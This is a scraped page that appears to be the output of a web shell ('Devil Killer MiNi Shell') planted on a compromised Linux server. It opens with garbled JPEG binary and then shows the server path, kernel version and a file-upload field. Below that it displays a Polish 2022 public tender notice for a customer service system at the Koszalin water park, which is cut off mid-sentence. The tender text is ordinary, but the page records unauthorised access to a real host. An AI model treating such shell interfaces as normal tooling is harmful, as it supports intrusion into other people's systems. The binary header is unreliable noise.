JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220324/0009754103-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zakup i wdrożenie Elektronicznego Systemu Obsługi Klienta dla potrzeb Parku Wodnego Koszalin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD OBIEKTÓW SPORTOWYCH SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330241018</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rolna 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-436</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">947216008</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zos.koszalin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zos.koszalin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i wdrożenie Elektronicznego Systemu Obsługi Klienta dla potrzeb Parku Wodnego Koszalin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a9747c02-ab66-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00097541</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://zos.koszalin.ibip.pl/public/?id=254943 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między ZAMAWIAJĄCYM a WYKONAWCAMI odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej, za pośrednictwem miniPortalu lub poczty elektronicznej. Adres mailowy przeznaczony do komunikacji: przetargi@zos.koszalin.pl. <br/>2. ZAMAWIAJĄCY rekomenduje zastosowanie poczty elektronicznej do komunikacji pomiędzy stronami, nie dotyczy to czynności złożenia ofert oraz dokumentów składanych wraz z ofertą. <br/>4. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do ZAMAWIAJĄCEGO przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej. W przypadku nie potwierdzenia ze strony WYKONAWCY odbioru przesłanych informacji (pomimo takiego żądania) ZAMAWIAJĄCY uzna, że wiadomość została skutecznie przekazana do WYKONAWCY po wydrukowaniu prawidłowego komunikatu poczty elektronicznej o wysłaniu informacji.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.	Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym na adres e-mail ZAMAWIAJACEGO przyjmuje się datę dostarczenia wiadomości na wskazany powyżej adres e-mail.<br/>5.	W korespondencji kierowanej do ZAMAWIAJĄCEGO WYKONAWCA winien posługiwać się znakiem sprawy określonym w SWZ.<br/>6.	Korzystanie z miniPortalu jest bezpłatne i wymaga posiadania konta na ePUAP (http://epuap.gov.pl/wps/portal).<br/>7.	WYKONAWCA posiadający konto na ePUAP ma dostęp do następujących formularzy, znajdujących się na miniPortalu:<br/>a)	„Formularz do złożenia, zmiany, wycofania oferty lub wniosku”,<br/>b)	„Formularz do komunikacji”.<br/>8.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Regulaminie korzystania z systemu miniPortal” (https://miniportal.uzp.gov.pl/WarunkiUslugi) oraz w „Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)” (https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin).<br/>9.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanego „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularza komunikacji” wynosi 150 MB.<br/>10.	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>11.	Informacje, oświadczenia lub dokumenty przekazywane w niniejszym postepowaniu sporządza się w postaci elektronicznej, w formatach określonych w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla systemów teleinformatycznych (tj. DZ. U. z 2017 r. poz, 2247) z uwzględnieniem rodzaju przekazywanych danych:<br/>a)	wyłącznie w postaci elektronicznej – oferta, oświadczenia z art. 125 ust. 1 Pzp, podmiotowe i przedmiotowe środki dowodowe, oświadczenie z art. 117 ust. 4 Pzp, oświadczenie z art. 118 ust. 3 Pzp, pełnomocnictwa z odpowiednim podpisem,<br/>b)	w postaci elektronicznej lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej wskazanych w ust. 1 – informacje, oświadczenia lub dokumenty przekazywane w postępowaniu, inne niż wymienione w pkt a).<br/>12.	Dokumenty elektroniczne składane przez WYKONAWCÓW muszą spełniać łącznie następujące wymagania:<br/>a)	są utrwalone w sposób umożliwiający wielkokrotne odczytanie, zapisanie, powielanie i przekazanie przy użyciu środków komunikacji elektronicznej lub na informatycznym nośniku danych,<br/>b)	umożliwiają prezentacje treści w postaci elektronicznej, przede wszystkim przez wyświetlanie treści na monitorze ekranowym,<br/>c)	umożliwiają prezentacje treści w postaci papierowej, w szczególności za pomocą wydruku,<br/>d)	zawierają dane w postaci niepozostawiającej wątpliwości co do treści i kontekstu zapisanych informacji.<br/>13.	Podpisywanie dokumentów za pomocą kwalifikowanego podpisu elektronicznego:<br/>a)	dla dokumentów sporządzonych w formacie .pdf zaleca się zastosowanie podpisu w formacie PAdES ze znacznikiem czasu,<br/>b)	dla pozostałych formatów zaleca się zastosowanie podpisu wewnętrznego w formacie XAdES ze znacznikiem czasu,<br/>c)	w przypadku zastosowania podpisu w formacie XAdES w wariancie zewnętrznym należy pamiętać o przekazaniu zarówno podpisywanego dokumentu jak i pliku podpisu zewnętrznego.<br/>14.	Do podpisywania dokumentów za pomocą podpisu zaufanego należy posiadać profil zaufany ePUAP (https://www.gov.pl/web/gov/zaloz-profil-zaufany). Do złożenia podpisu zaufanego służy serwis pod adresem https://www.gov.pl/web/gov/podpisz-dokument-elektronicznie-wykorzystaj-podpis-zaufany.<br/>15.	Do podpisywania dokumentów za pomocą podpisu osobistego należy posiadać dowód osobisty z certyfikatem podpisu osobistego i specjalistyczny czytnik. Szczegóły znajdują się na portalu https://www.gov.pl/web/e-dowod/podpis-osobisty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Patrz par. XXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz par. XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.261.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i wdrożenie Elektronicznego Systemu Obsługi Klienta dla potrzeb Parku Wodnego Koszalin wraz z pełną dokumentacją, przeszkoleniem pracowników, dostawą sprzętu informatycznego, wykonaniem okablowania szafek, obsługą gwarancyjną, asystą autorską i opieką powdrożeniową, obejmującej w szczególności następujące świadczenia:<br/>a)	dostawa niezbędnego sprzętu i oprogramowania, zainstalowanie elementów systemu, wymiana zamków w szafkach basenowych wraz z ich okablowaniem, skonfigurowanie i uruchomienie oprogramowania ESOK,<br/>b)	przeszkolenie pracowników ZAMAWIAJĄCEGO,<br/>c)	dostawa pełnej dokumentacji dotyczącej wdrożonego systemu ESOK w języku polskim <br/>d)	udzielenie licencji niezbędnych do poprawnego funkcjonowania systemu ESOK,<br/>e)	dostarczenie koncepcji współpracy oprogramowania ESOK z posiadanymi przez ZAMAWIAJĄCEGO systemami,<br/>f)	asysta autorska, opieka serwisowa i powdrożeniowa </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48700000-5 - Pakiety oprogramowania użytkowego</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72267000-4 - Usługi w zakresie konserwacji i napraw oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">77 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty ZAMAWIAJĄCY będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>wynagrodzenie brutto – waga kryterium 70% <br/>termin realizacji – waga kryterium 30%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności do występowania w obrocie gospodarczym – ZAMAWIAJĄCY nie stawia wymagań.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – ZAMAWIAJĄCY nie stawia wymagań.<br/>3)	sytuacji ekonomicznej lub finansowej – ZAMAWIAJĄCY nie stawia wymagań.<br/>4)	zdolności technicznej lub zawodowej – ZAMAWIAJĄCY uzna, że WYKONAWCA spełnia warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie lub wykonuje należycie min. 2 zamówienia na zakup i wdrożenie Elektronicznego Systemu Obsługi Klienta o wartości co najmniej 250.000,00 zł na obiektach basenowych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">ZAMAWIAJĄCY nie wymaga</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, w zakresie wskazanym przez ZAMAWIAJĄCEGO w § IX ust. 2 pkt 4 SWZ, wraz z dowodami określającymi czy te usługi zostały wykonane lub są wykonywane należycie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> ZAMAWIAJĄCY żąda, by WYKONAWCA złożył wraz z ofertą następujące przedmiotowe środki dowodowe: opis rozwiązań równoważnych (jeśli zostaną zastosowane) zgodnie z wymaganiami opisanymi w załączniku nr 9 do SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Opis rozwiązań równoważnych (jeśli zostaną zastosowane) zgodnie z wymaganiami opisanymi w załączniku nr 9 <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Formularz ofertowy (załącznik nr 4 do SWZ)<br/>2)	oświadczenie zgodne z art. 125 ust. 1 <br/>3)	Samooczyszczenie (jeśli dotyczy)<br/>4)	Pełnomocnictwo (jeśli dotyczy)<br/>5)	Oświadczenie WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) zgodnie z art. 117 ust. 4 Pzp (jeśli dotyczy)<br/>6)	Zobowiązanie Podmiotu Trzeciego zgodnie z art. 118 ust. 3-4 Pzp (jeśli dotyczy)<br/>7)	Zastrzeżenie tajemnicy przedsiębiorstwa (jeśli dotyczy)<br/>8)	Protokół z odbycia obowiązkowej wizji lokalnej (załącznik nr 6 do SWZ)<br/>9)	Wykaz rozwiązań równoważnych (załącznik nr 9 do SWZ) (jeśli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	WYKONAWCY występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2)	Wszelka korespondencja będzie prowadzona przez ZAMAWIAJĄCEGO wyłącznie z pełnomocnikiem.<br/>3)	Zawarte w SWZ warunki i wymagania dotyczące WYKONAWCY stosuje się odpowiednio do WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia.<br/>4)	Warunek niepodlegania wykluczeniu z postępowania opisany w § IX ust. 1 SWZ powinien spełniać każdy z WYKONAWCÓW samodzielnie.<br/>5)	W przypadku WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia poszczególne warunki udziału w postępowaniu określone w § IX ust. 2 pkt 1 - 3 SWZ musi spełniać co najmniej jeden WYKONAWCA samodzielnie. Nie dopuszcza się łączenia cząstkowego potencjału WYKONAWCÓW. <br/>6)	WYKONAWCY wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni WYKONAWCY.<br/>7)	ZAMAWIAJĄCY dopuszcza łączne spełnienie warunku przez WYKONAWCÓW w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej, opisanego w § IX ust. 2 pkt 4.<br/>8)	WYKONAWCY wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z WYKONAWCÓW, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji WYKONAWCY są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni WYKONAWCY.<br/>9)	WYKONAWCY składający wspólną ofertę ponoszą solidarną odpowiedzialność za zobowiązania wynikające z umowy.<br/>10)	Jeżeli zostanie wybrana oferta WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia, ZAMAWIAJĄCY może zażądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych WYKONAWCÓW, przy czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji zamówienia. Umowa taka winna określać:<br/>a) strony umowy, <br/>b)	cel działania, <br/>c)	sposób współdziałania, <br/>d)	zakres prac przewidzianych do wykonania dla każdej ze Stron, <br/>e)	solidarną odpowiedzialność za wykonanie zamówienia, <br/>f)	oznaczenie czasu trwania (obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi), <br/>g)	wykluczenie możliwości wypowiedzenia umowy przez którąkolwiek ze stron do czasu wykonania zamówienia, <br/>pełnomocnika uprawnionego do kontaktów z ZAMAWIAJĄCYM oraz do wystawiania dokumentów związanych z płatnościami. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności takiej zmiany, z zachowaniem warunków przewidzianych w dziale VII rozdziale 3 ustawy Pzp.<br/>2.	ZAMAWIAJĄCY przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w następujących sytuacjach:<br/>a)	zmiany są konieczne w związku ze zmianami przepisów prawa;<br/>b)	zmiana lub rezygnacja z PODWYKONAWCY, na którego zasoby WYKONAWCA powoływał się w celu wykazania spełniania warunków udziału w postępowaniu, pod warunkiem, że WYKONAWCA wykaże ZAMAWIAJĄCEMU, iż proponowany inny PODWYKONAWCA lub WYKONAWCA samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia;<br/>c)	zmiana zakresu przedmiotu zamówienia i wynagrodzenia, jeżeli zmiany są korzystne dla ZAMAWIAJĄCEGO, lub zmiany z przyczyn technologicznych, ekonomicznych, pogodowych lub organizacyjnych, w sytuacji niemożliwej do przewidzenia lub niewynikającej z przyczyn leżących po stronie ZAMAWIAJĄCEGO, w tym obostrzeń epidemicznych;<br/>d)	zmiany terminów realizacji przedmiotu zamówienia, jeżeli zmiana taka będzie uzasadniona warunkami organizacyjnymi, jeśli wystąpi konieczność wykonania dodatkowych prac lub robót, niemożliwych do przewidzenia w chwili podpisania umowy, a które będą miały wpływ na przedłużenie terminu wykonania przedmiotu umowy lub jeśli zaszły 